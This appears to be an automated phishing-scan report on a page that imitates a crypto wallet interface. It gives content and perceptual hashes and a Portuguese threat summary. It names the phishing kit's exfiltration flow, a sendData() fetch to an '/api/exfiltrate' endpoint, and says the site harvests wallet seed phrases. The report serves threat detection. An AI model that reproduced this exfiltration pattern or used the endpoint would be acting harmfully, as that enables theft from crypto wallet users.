Detailed analysis of captured phishing page
Used to detect similar phishing pages based on HTML content
| Algorithm | Hash Value |
|---|---|
|
CONTENT
TLSH
|
T11A321360F0B4AB3B51E3D5E2B771376A5D9FC22AC46BD402BEE5C28B4BC9D10CD09256 |
|
CONTENT
ssdeep
|
192:be6sjqspTvsNdcXACAi/L9/7gCY6kRzVVBsnH:ZRATvsLcXACAi/L9/7TY6kRzVXSH |
Used to detect visually similar phishing pages based on screenshots
| Algorithm | Hash Value |
|---|---|
|
VISUAL
pHash
|
c98c36b1cccdc1b6 |
|
VISUAL
aHash
|
ff04787878781818 |
|
VISUAL
dHash
|
f278f2d2c2d2d2f0 |
|
VISUAL
wHash
|
ff38787878781838 |
|
VISUAL
colorHash
|
000010001c0 |
|
VISUAL
cropResistant
|
6b695332ada6f5b5,f278f2d2c2d2d2f0 |
• Ameaça: Phishing
• Alvo: Usuários de carteiras cripto
• Método: Imitação da interface de uma carteira.
• Exfil: Desconhecido (provavelmente informações da carteira)
• Indicadores: Hospedagem gratuita, imitação da interface da carteira, javascript ofuscado
• Risco: ALTO
The site attempts to steal a user's wallet credentials or seed phrase.
User fills <input name='username'> → sendData() → fetch('https://dappconnecthub.pages.dev/api/exfiltrate') → Data sent to remote server
User fills <input name='username'> → sendData() → fetch('https://dappconnecthub.pages.dev/api/exfiltrate') → Data sent to remote server
index-3a7670c9.jssendDatasubmitFormPages with identical visual appearance (based on perceptual hash)
Found 1 other scan for this domain